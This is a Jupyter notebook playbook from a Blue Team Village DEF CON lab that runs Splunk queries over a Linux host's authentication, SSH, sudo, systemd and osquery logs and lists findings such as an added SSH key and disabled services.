# IaaS Linux Logs Review Template - Splunk
BTV Project Obsidian, 2023

Author: juju43, https://blueteamvillage.org/programs/project-obsidian/ https://discord.gg/blueteamvillage
<img align="right" width="100" height="100" src="https://cfc.blueteamvillage.org/media/call-for-content-2021/img/20200622_BTVillage_logos_RGB_pos_hcOC7Qx.png">

This playbook is to help validating available logs
It helps to baseline environment, identify gaps and control points.

It targets Defcon31 BlueTeamVillage Project obsidian environment and splunk platform but it can be adapt to other logging platforms.

Resources
* https://github.com/microsoft/msticpy/
* https://infosecjupyterthon.com/
* https://dropbox.tech/security/how-dropbox-security-builds-better-tools-for-threat-detection-and-incident-response
(Linux)
* https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Linux%20Host.ipynb
* https://securitydatasets.com/notebooks/atomic/linux/intro.html
(Win)
* https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Windows%20Host.ipynb
* https://github.com/OTRF/ThreatHunter-Playbook/tree/master/docs/hunts/windows
* https://securitydatasets.com/notebooks/atomic/windows/intro.html


## Findings

* new ssh key added (osquery pack_osquery-custom-pack_authorized_keys)
* change of server dns nameservers (osquery pack_osquery-custom-pack_dns_resolvers; removed but none added seen?)
* usage of kerbrute, crackmapexec, and more (sysmonforlinux process). missing part of process tree
* no fim traces (osquery; bug, misconfiguration, tampering or log ingestion issue?)
* python packages install traces through sysmonforlinux process but not osquery (pack_osquery-custom-pack_python_packages; bug, misconfiguration, tampering or log ingestion issue?)
* multiple services deactivation from systemd include sshd, systemd-resolved.
  * Careful! Here we can see filebeat collection via journald or via log file is not equivalent...
* fun fact: crackmapexec execution before tool install generated a call to `snap snap-advise --command crackmapexec`

## Table of Contents

* Import
* Configuration
* Queries
  * Authentication
    * fail
    * success
  * Remote access
  * Privilege escalation
  * Privileged users activities? root, Administrator...
  * Service activities
    * Time
    * Logging
    * Scheduled tasks
  * System boot, on/off
  * Process activities
  * Network activities
  * File Integrity Monitoring (FIM)
  * AV logs?
  * Misc

## Import

In [1]:
# Check we are running Python 3.6
import sys
MIN_REQ_PYTHON = (3,6)
if sys.version_info < MIN_REQ_PYTHON:
    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')
    print('or later is selected as the active kernel.')
    sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)

In [2]:
# Imports
import pandas as pd
import msticpy.nbtools as nbtools
from datetime import datetime,timedelta
import os

In [3]:
# path to config file
os.environ['MSTICPYCONFIG'] = '/home/ubuntu/msticpyconfig.yaml'
from msticpy.nbtools import *
from msticpy.data.data_providers import QueryProvider
from msticpy.common.wsconfig import WorkspaceConfig
from msticpy.nbtools.data_viewer import DataViewer
from msticpy.vis.matrix_plot import plot_matrix
from msticpy.nbtools import process_tree as ptree
print('Imports Complete')

Imports Complete


## Configuration

In [4]:
# Interactive settings edit
# https://msticpy.readthedocs.io/en/latest/getting_started/SettingsEditor.html#using-mpconfigfile-to-check-and-manage-your-msticpyconfig-yaml
from msticpy.config import MpConfigFile, MpConfigEdit, MpConfigControls
mpconfig = MpConfigFile()
# mpconfig.load_default()
# mpconfig.view_settings()
mpconfig

In [5]:
# q_times = nbwidgets.QueryTime(units='hours', max_before=72, before=1, max_after=0)
q_times = nbwidgets.QueryTime(origin_time=datetime(2023, 4, 29), units='days', max_before=3, before=1, max_after=0)
q_times.display()

In [6]:
query_common_args = '''agent.name=ip-172-16-40-100 earliest="04/29/2023:01:00:00" latest="04/29/2023:23:00:00"'''

In [7]:
# Configuration
# if free splunk, 
#  * enable the 'allowRemoteLogin' setting in your server.conf file - /opt/splunk/etc/system/local/server.conf
splunk_prov = QueryProvider('Splunk')
splunk_prov.connect()

connected


In [8]:
# pandas
pd.set_option('display.max_colwidth', 500)

## Queries

### Authentication

In [9]:
splunk_query = f'''search index=linux su: {query_common_args}
| stats count by host,message'''
df_su = splunk_prov.exec_query(splunk_query)
df_su.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 94.27it/s]


,host,message,count
0,ip-172-16-40-100,Apr 29 19:54:34 ip-172-16-40-100 su: (to root) root on pts/1,2
1,ip-172-16-40-100,Apr 29 19:54:34 ip-172-16-40-100 su: pam_unix(su:session): session opened for user root(uid=0) by ubuntu(uid=0),2
2,ip-172-16-40-100,Apr 29 22:04:24 ip-172-16-40-100 su: pam_unix(su:session): session closed for user root,2
3,ip-172-16-40-100,pam_unix(su:session): session opened for user root(uid=0) by ubuntu(uid=0),2


In [10]:
splunk_query = f'''search index=linux session {query_common_args}
| stats count by host,message'''
df_session = splunk_prov.exec_query(splunk_query)
df_session.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 95.08it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,host,message,count
0,ip-172-16-40-100,ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/bin/su,4
1,ip-172-16-40-100,ubuntu : problem with defaults entries ; TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ;,2
2,ip-172-16-40-100,ubuntu : unable to resolve host ip-172-16-40-100: Temporary failure in name resolution,2
3,ip-172-16-40-100,(root) CMD ( cd / && run-parts --report /etc/cron.hourly),2
4,ip-172-16-40-100,(to root) root on pts/1,2
5,ip-172-16-40-100,Apr 29 18:17:01 ip-172-16-40-100 CRON[110709]: pam_unix(cron:session): session opened for user root(uid=0) by (uid=0),2
6,ip-172-16-40-100,Apr 29 19:52:00 ip-172-16-40-100 sshd[111122]: pam_unix(sshd:session): session opened for user ubuntu(uid=1000) by (uid=0),2
7,ip-172-16-40-100,Apr 29 19:52:00 ip-172-16-40-100 systemd-logind[533]: New session 50 of user ubuntu.,2
8,ip-172-16-40-100,Apr 29 19:52:00 ip-172-16-40-100 systemd: pam_unix(systemd-user:session): session opened for user ubuntu(uid=1000) by (uid=0),2
9,ip-172-16-40-100,Apr 29 19:52:00 ip-172-16-40-100 systemd[111125]: Listening on REST API socket for snapd user session agent.,2


### Remote access

In [11]:
splunk_query = f'''search index=linux sshd (accepted OR failed) {query_common_args}
| stats count by host,message'''
df_ssh = splunk_prov.exec_query(splunk_query)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 96.88it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


In [12]:
df_ssh[['host', 'message']].head(10)
# df_ssh.head(10)

,host,message
0,ip-172-16-40-100,Accepted publickey for ubuntu from 18.220.210.56 port 32944 ssh2: RSA SHA256:ld2khyX0DVEOUgAdZxTITd6k3Cggme5OFSjYNsUi5Ck
1,ip-172-16-40-100,Accepted publickey for ubuntu from 18.220.210.56 port 32946 ssh2: RSA SHA256:ld2khyX0DVEOUgAdZxTITd6k3Cggme5OFSjYNsUi5Ck
2,ip-172-16-40-100,Accepted publickey for ubuntu from 18.220.210.56 port 34062 ssh2: RSA SHA256:ld2khyX0DVEOUgAdZxTITd6k3Cggme5OFSjYNsUi5Ck
3,ip-172-16-40-100,Accepted publickey for ubuntu from 18.220.210.56 port 40742 ssh2: RSA SHA256:ld2khyX0DVEOUgAdZxTITd6k3Cggme5OFSjYNsUi5Ck
4,ip-172-16-40-100,Accepted publickey for ubuntu from 18.220.210.56 port 45664 ssh2: RSA SHA256:ld2khyX0DVEOUgAdZxTITd6k3Cggme5OFSjYNsUi5Ck
5,ip-172-16-40-100,Apr 29 19:52:00 ip-172-16-40-100 sshd[111122]: Accepted publickey for ubuntu from 18.220.210.56 port 34062 ssh2: RSA SHA256:ld2khyX0DVEOUgAdZxTITd6k3Cggme5OFSjYNsUi5Ck
6,ip-172-16-40-100,Apr 29 19:54:24 ip-172-16-40-100 sshd[111240]: Accepted publickey for ubuntu from 18.220.210.56 port 40742 ssh2: RSA SHA256:ld2khyX0DVEOUgAdZxTITd6k3Cggme5OFSjYNsUi5Ck
7,ip-172-16-40-100,Apr 29 20:27:22 ip-172-16-40-100 sshd[113613]: Accepted publickey for ubuntu from 18.220.210.56 port 45664 ssh2: RSA SHA256:ld2khyX0DVEOUgAdZxTITd6k3Cggme5OFSjYNsUi5Ck
8,ip-172-16-40-100,Apr 29 20:27:45 ip-172-16-40-100 sshd[113674]: Accepted publickey for ubuntu from 18.220.210.56 port 32944 ssh2: RSA SHA256:ld2khyX0DVEOUgAdZxTITd6k3Cggme5OFSjYNsUi5Ck
9,ip-172-16-40-100,Apr 29 20:27:48 ip-172-16-40-100 sshd[113724]: Accepted publickey for ubuntu from 18.220.210.56 port 32946 ssh2: RSA SHA256:ld2khyX0DVEOUgAdZxTITd6k3Cggme5OFSjYNsUi5Ck


In [13]:
# sshd[1234]: Starting session: subsystem 'sftp' for USER from 10.x.y.z port 55098 id 1
splunk_query = f'''search index=linux sshd subsystem {query_common_args}
| stats count by host,message'''
df_sftp = splunk_prov.exec_query(splunk_query)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 97.13it/s]

Warning - query did not return any results.



/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


In [14]:
splunk_query = f'''search index=osquery {query_common_args}
| spath input=message
| search name="pack_osquery-custom-pack_authorized_keys"'''
df_ssh_authorized_keys = splunk_prov.exec_query(splunk_query)
df_ssh_authorized_keys.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 94.26it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,_bkt,_cd,_indextime,_raw,_serial,_si,_sourcetype,_subsecond,_time,agent.name,...,hostIdentifier,index,linecount,message,name,numerics,source,sourcetype,splunk_server,unixTime
0,osquery~5~BEE3FED0-1943-432F-A851-D74F85B46362,5:147689,1682798112,"{""@timestamp"":""2023-04-29T19:55:10.887Z"",""log"":{""offset"":5697816,""file"":{""path"":""/var/log/osquery/osqueryd.results.log""}},""message"":""{\""name\"":\""pack_osquery-custom-pack_authorized_keys\"",\""hostIdentifier\"":\""ip-172-16-40-100\"",\""calendarTime\"":\""Sat Apr 29 19:55:08 2023 UTC\"",\""unixTime\"":1682798108,\""epoch\"":0,\""counter\"":1,\""numerics\"":false,\""decorations\"":{\""host_uuid\"":\""ec24eb0d-2f49-5eb4-da77-1878abd17af8\"",\""username\"":\""\""},\""columns\"":{\""algorithm\"":\""ssh-rsa\"",\""comment\"":\""\"",\""...",738,"[ip-172-16-22-20, osquery]",osquery,.887,2023-04-29T19:55:10.887+00:00,ip-172-16-40-100,...,ip-172-16-40-100,osquery,1,"[{""name"":""pack_osquery-custom-pack_authorized_keys"",""hostIdentifier"":""ip-172-16-40-100"",""calendarTime"":""Sat Apr 29 19:55:08 2023 UTC"",""unixTime"":1682798108,""epoch"":0,""counter"":1,""numerics"":false,""decorations"":{""host_uuid"":""ec24eb0d-2f49-5eb4-da77-1878abd17af8"",""username"":""""},""columns"":{""algorithm"":""ssh-rsa"",""comment"":"""",""key"":""AAAAB3NzaC1yc2EAAAADAQABAAACAQCqw5jYoWl9iajxA4JKKw7TtyMqQN+GltcOXL7DR3rPWYKJ32qKRi53t1zAKSVNwN8JmKE9EWTwOMRjq4F19SnsdjZhyGiZCKc2mzckWQN6bf2dcDfddUHgjswGLDzQkSYU0/Ks/Ew...",pack_osquery-custom-pack_authorized_keys,false,osquery,osquery,ip-172-16-22-20,1682798108


### Privilege Escalation

In [15]:
splunk_query = f'''search index=linux sudo {query_common_args}
| stats count by host,message'''
df_sudo = splunk_prov.exec_query(splunk_query)
df_sudo.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 94.01it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,host,message,count
0,ip-172-16-40-100,ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/bin/su,4
1,ip-172-16-40-100,ubuntu : problem with defaults entries ; TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ;,2
2,ip-172-16-40-100,ubuntu : unable to resolve host ip-172-16-40-100: Temporary failure in name resolution,2
3,ip-172-16-40-100,Apr 29 19:52:35 ip-172-16-40-100 sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/bin/su,2
4,ip-172-16-40-100,Apr 29 19:54:34 ip-172-16-40-100 sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/bin/su,2
5,ip-172-16-40-100,Apr 29 19:54:34 ip-172-16-40-100 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by ubuntu(uid=1000),2
6,ip-172-16-40-100,pam_unix(sudo:session): session opened for user root(uid=0) by ubuntu(uid=1000),4


### Services activities

In [16]:
splunk_query = f'''search index=linux "journald.process.name"=systemd (start OR stop OR Deactivated) {query_common_args}
| stats count by host,message'''
df_services = splunk_prov.exec_query(splunk_query)
df_services.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 94.95it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,host,message,count
0,ip-172-16-40-100,Closed D-Bus User Message Bus Socket.,6
1,ip-172-16-40-100,Closed GnuPG cryptographic agent (ssh-agent emulation).,6
2,ip-172-16-40-100,Closed GnuPG cryptographic agent and passphrase cache (access for web browsers).,6
3,ip-172-16-40-100,Closed GnuPG cryptographic agent and passphrase cache (restricted).,6
4,ip-172-16-40-100,Closed GnuPG cryptographic agent and passphrase cache.,6
5,ip-172-16-40-100,Closed GnuPG network certificate management daemon.,6
6,ip-172-16-40-100,Closed REST API socket for snapd user session agent.,6
7,ip-172-16-40-100,Closed debconf communication socket.,6
8,ip-172-16-40-100,Created slice User Application Slice.,6
9,ip-172-16-40-100,Created slice User Slice of UID 1000.,6


In [17]:
splunk_query = f'''search index=linux "journald.process.name"=systemd (ntpd OR openntpd OR ntpdate OR rdate OR chrony) {query_common_args}
| stats count by host,message'''
df_service_time = splunk_prov.exec_query(splunk_query)
df_service_time.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 95.85it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,host,message,count
0,ip-172-16-40-100,"Started chrony, an NTP client/server.",2
1,ip-172-16-40-100,"Starting chrony, an NTP client/server...",2
2,ip-172-16-40-100,"Stopped chrony, an NTP client/server.",2
3,ip-172-16-40-100,"Stopping chrony, an NTP client/server...",2
4,ip-172-16-40-100,chrony.service: Consumed 2.331s CPU time.,2
5,ip-172-16-40-100,chrony.service: Deactivated successfully.,2


In [18]:
splunk_query = f'''search index=linux "journald.process.name"=systemd (journald OR rsyslog OR syslog-ng) {query_common_args}
| stats count by host,message'''
df_service_logging = splunk_prov.exec_query(splunk_query)
df_service_logging.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 96.78it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,host,message,count
0,ip-172-16-40-100,Closed D-Bus User Message Bus Socket.,6
1,ip-172-16-40-100,Closed GnuPG cryptographic agent (ssh-agent emulation).,6
2,ip-172-16-40-100,Closed GnuPG cryptographic agent and passphrase cache (access for web browsers).,6
3,ip-172-16-40-100,Closed GnuPG cryptographic agent and passphrase cache (restricted).,6
4,ip-172-16-40-100,Closed GnuPG cryptographic agent and passphrase cache.,6
5,ip-172-16-40-100,Closed GnuPG network certificate management daemon.,6
6,ip-172-16-40-100,Closed REST API socket for snapd user session agent.,6
7,ip-172-16-40-100,Closed debconf communication socket.,6
8,ip-172-16-40-100,Created slice User Application Slice.,6
9,ip-172-16-40-100,Created slice User Slice of UID 1000.,6


In [19]:
splunk_query = f'''search index=linux "journald.process.name"=systemd (cron OR at OR systemd-timers) {query_common_args}
| stats count by host,message'''
df_service_scheduledtasks = splunk_prov.exec_query(splunk_query)
df_service_scheduledtasks.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 96.99it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,host,message,count
0,ip-172-16-40-100,Started Regular background program processing daemon.,2
1,ip-172-16-40-100,Stopped Regular background program processing daemon.,2
2,ip-172-16-40-100,Stopping Regular background program processing daemon...,2
3,ip-172-16-40-100,cron.service: Deactivated successfully.,2


In [20]:
splunk_query = f'''search index=linux "input.type"!=journald (start OR stop OR Deactivated) {query_common_args}
| stats count by host,agent.type,input.type,message'''
df_services2 = splunk_prov.exec_query(splunk_query)
df_services2.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 96.34it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,host,agent.type,input.type,message,count
0,ip-172-16-40-100,filebeat,log,Apr 29 19:52:00 ip-172-16-40-100 systemd[111125]: Queued start job for default target Main User Target.,2
1,ip-172-16-40-100,filebeat,log,Apr 29 19:54:24 ip-172-16-40-100 systemd[111243]: Queued start job for default target Main User Target.,2
2,ip-172-16-40-100,filebeat,log,Apr 29 20:01:38 ip-172-16-40-100 systemd[1]: chrony.service: Deactivated successfully.,2
3,ip-172-16-40-100,filebeat,log,Apr 29 20:01:38 ip-172-16-40-100 systemd[1]: cron.service: Deactivated successfully.,2
4,ip-172-16-40-100,filebeat,log,Apr 29 20:01:38 ip-172-16-40-100 systemd[1]: irqbalance.service: Deactivated successfully.,2
5,ip-172-16-40-100,filebeat,log,Apr 29 20:01:38 ip-172-16-40-100 systemd[1]: polkit.service: Deactivated successfully.,2
6,ip-172-16-40-100,filebeat,log,Apr 29 20:01:39 ip-172-16-40-100 PackageKit: daemon start,2
7,ip-172-16-40-100,filebeat,log,Apr 29 20:01:39 ip-172-16-40-100 kernel: [131708.892459] systemd[1]: systemd-networkd-wait-online.service: Deactivated successfully.,2
8,ip-172-16-40-100,filebeat,log,Apr 29 20:01:39 ip-172-16-40-100 kernel: [131708.920591] systemd[1]: systemd-resolved.service: Deactivated successfully.,2
9,ip-172-16-40-100,filebeat,log,Apr 29 20:01:39 ip-172-16-40-100 kernel: [131708.950196] systemd[1]: ssh.service: Deactivated successfully.,2


In [21]:
splunk_query = f'''search index=linux "journald.process.name"=systemd systemd-resolved {query_common_args}
| stats count by host,agent.type,input.type,message'''
df_systemdresolved1 = splunk_prov.exec_query(splunk_query)
df_systemdresolved1.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 95.92it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,host,agent.type,input.type,message,count
0,ip-172-16-40-100,filebeat,journald,Starting Network Name Resolution...,2


In [22]:
splunk_query = f'''search index=linux systemd-resolved {query_common_args}
| stats count by host,agent.type,log.file.path,message'''
df_systemdresolved2 = splunk_prov.exec_query(splunk_query)
df_systemdresolved2.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 95.18it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,host,agent.type,log.file.path,message,count
0,ip-172-16-40-100,filebeat,/var/log/syslog,Apr 29 20:01:39 ip-172-16-40-100 kernel: [131708.920591] systemd[1]: systemd-resolved.service: Deactivated successfully.,2
1,ip-172-16-40-100,filebeat,/var/log/syslog,Apr 29 20:01:39 ip-172-16-40-100 systemd-resolved[112854]: . IN DS 20326 8 2 e06d44b80b8f1d39a95c0b0d7c65d08458e880409bbc683457104237c7f8ec8d,2
2,ip-172-16-40-100,filebeat,/var/log/syslog,Apr 29 20:01:39 ip-172-16-40-100 systemd-resolved[112854]: Negative trust anchors: home.arpa 10.in-addr.arpa 16.172.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa 168.192.in-addr.arpa d.f.ip6.arpa corp home internal intranet lan l...,2
3,ip-172-16-40-100,filebeat,/var/log/syslog,Apr 29 20:01:39 ip-172-16-40-100 systemd-resolved[112854]: Positive Trust Anchors:,2
4,ip-172-16-40-100,filebeat,/var/log/syslog,Apr 29 20:01:39 ip-172-16-40-100 systemd-resolved[112854]: Using system hostname 'ip-172-16-40-100'.,2


### System boot, on/off

In [23]:
splunk_query = f'''search index=linux "journald.process.name"=systemd (halt OR shutdown???) {query_common_args}
| stats count by host,message'''
df_system_onoff = splunk_prov.exec_query(splunk_query)
if not df_system_onoff or df_system_onoff.empty:
    print("No results")
else:
    df_system_onoff.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 96.17it/s]

Warning - query did not return any results.
No results



/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


### Error, warnings

In [24]:
splunk_query = f'''search index=linux error {query_common_args}
| head 10'''
df_errors = splunk_prov.exec_query(splunk_query)
df_errors.head(5)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 93.31it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,_bkt,_cd,_indextime,_raw,_serial,_si,_sourcetype,_subsecond,_time,agent.name,host,index,linecount,source,sourcetype,splunk_server
0,linux~18~BEE3FED0-1943-432F-A851-D74F85B46362,18:144246,1683924149,"{""@timestamp"":""2023-04-29T22:59:45.028Z"",""log"":{""file"":{""path"":""/var/log/syslog""},""offset"":148565680},""message"":""Apr 29 22:59:39 ip-172-16-40-100 filebeat[109329]: {\""log.level\"":\""error\"",\""@timestamp\"":\""2023-04-29T22:59:39.158Z\"",\""log.logger\"":\""publisher_pipeline_output\"",\""log.origin\"":{\""file.name\"":\""pipeline/client_worker.go\"",\""file.line\"":150},\""message\"":\""Failed to connect to backoff(elasticsearch(https://172.16.22.10:9200)): Get \\\""https://172.16.22.10:9200\\\"": net/http: requ...",0,"[ip-172-16-22-20, linux]",filebeat,.028,2023-04-29T22:59:45.028+00:00,ip-172-16-40-100,ip-172-16-40-100,linux,1,linux,filebeat,ip-172-16-22-20
1,linux~18~BEE3FED0-1943-432F-A851-D74F85B46362,18:46541,1683924146,"{""@timestamp"":""2023-04-29T22:59:45.028Z"",""log"":{""file"":{""path"":""/var/log/syslog""},""offset"":148565680},""message"":""Apr 29 22:59:39 ip-172-16-40-100 filebeat[109329]: {\""log.level\"":\""error\"",\""@timestamp\"":\""2023-04-29T22:59:39.158Z\"",\""log.logger\"":\""publisher_pipeline_output\"",\""log.origin\"":{\""file.name\"":\""pipeline/client_worker.go\"",\""file.line\"":150},\""message\"":\""Failed to connect to backoff(elasticsearch(https://172.16.22.10:9200)): Get \\\""https://172.16.22.10:9200\\\"": net/http: requ...",1,"[ip-172-16-22-20, linux]",filebeat,.028,2023-04-29T22:59:45.028+00:00,ip-172-16-40-100,ip-172-16-40-100,linux,1,linux,filebeat,ip-172-16-22-20
2,linux~18~BEE3FED0-1943-432F-A851-D74F85B46362,18:144113,1683924149,"{""@timestamp"":""2023-04-29T22:59:39.158Z"",""event"":{""kind"":""event"",""created"":""2023-04-29T22:59:40.339Z""},""log"":{""syslog"":{""priority"":6,""facility"":{""code"":3}}},""ecs"":{""version"":""8.0.0""},""user"":{""group"":{""id"":""0""},""id"":""0""},""process"":{""args_count"":13,""pid"":109329,""command_line"":""/usr/share/filebeat/bin/filebeat --environment systemd -c /etc/filebeat/filebeat.yml --path.home /usr/share/filebeat --path.config /etc/filebeat --path.data /var/lib/filebeat --path.logs /var/log/filebeat"",""args"":[""/usr/...",2,"[ip-172-16-22-20, linux]",filebeat,.158,2023-04-29T22:59:39.158+00:00,ip-172-16-40-100,ip-172-16-40-100,linux,1,linux,filebeat,ip-172-16-22-20
3,linux~18~BEE3FED0-1943-432F-A851-D74F85B46362,18:46363,1683924146,"{""@timestamp"":""2023-04-29T22:59:39.158Z"",""event"":{""kind"":""event"",""created"":""2023-04-29T22:59:40.339Z""},""log"":{""syslog"":{""priority"":6,""facility"":{""code"":3}}},""ecs"":{""version"":""8.0.0""},""user"":{""group"":{""id"":""0""},""id"":""0""},""process"":{""args_count"":13,""pid"":109329,""command_line"":""/usr/share/filebeat/bin/filebeat --environment systemd -c /etc/filebeat/filebeat.yml --path.home /usr/share/filebeat --path.config /etc/filebeat --path.data /var/lib/filebeat --path.logs /var/log/filebeat"",""args"":[""/usr/...",3,"[ip-172-16-22-20, linux]",filebeat,.158,2023-04-29T22:59:39.158+00:00,ip-172-16-40-100,ip-172-16-40-100,linux,1,linux,filebeat,ip-172-16-22-20
4,linux~18~BEE3FED0-1943-432F-A851-D74F85B46362,18:143940,1683924149,"{""@timestamp"":""2023-04-29T22:58:55.024Z"",""log"":{""offset"":148564147,""file"":{""path"":""/var/log/syslog""}},""message"":""Apr 29 22:58:52 ip-172-16-40-100 filebeat[109329]: {\""log.level\"":\""error\"",\""@timestamp\"":\""2023-04-29T22:58:52.401Z\"",\""log.logger\"":\""esclientleg\"",\""log.origin\"":{\""file.name\"":\""transport/logging.go\"",\""file.line\"":38},\""message\"":\""Error dialing dial tcp 172.16.22.10:9200: i/o timeout\"",\""service.name\"":\""filebeat\"",\""network\"":\""tcp\"",\""address\"":\""172.16.22.10:9200\"",\""ecs...",4,"[ip-172-16-22-20, linux]",filebeat,.024,2023-04-29T22:58:55.024+00:00,ip-172-16-40-100,ip-172-16-40-100,linux,1,linux,filebeat,ip-172-16-22-20


In [25]:
splunk_query = f'''search index=linux warn {query_common_args}
| head 10'''
df_warn = splunk_prov.exec_query(splunk_query)
df_warn.head(5)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 95.77it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,_bkt,_cd,_indextime,_raw,_serial,_si,_sourcetype,_subsecond,_time,agent.name,host,index,linecount,source,sourcetype,splunk_server
0,linux~18~BEE3FED0-1943-432F-A851-D74F85B46362,18:125189,1683924148,"{""@timestamp"":""2023-04-29T22:37:33.864Z"",""agent"":{""ephemeral_id"":""fa212351-5713-49b4-8a54-651130c40eb3"",""id"":""6cb12c8d-5f82-4045-ad01-b39039886fd5"",""name"":""ip-172-16-40-100"",""type"":""filebeat"",""version"":""8.7.0""},""log"":{""file"":{""path"":""/var/log/syslog""},""offset"":148474548},""message"":""Apr 29 22:37:32 ip-172-16-40-100 teleport[112836]: 2023-04-29T22:37:32Z WARN [NODE:1] Restart watch on error: connection error: desc = \""transport: Error while dialing failed to dial: context deadline exceeded\...",0,"[ip-172-16-22-20, linux]",filebeat,.864,2023-04-29T22:37:33.864+00:00,ip-172-16-40-100,ip-172-16-40-100,linux,1,linux,filebeat,ip-172-16-22-20
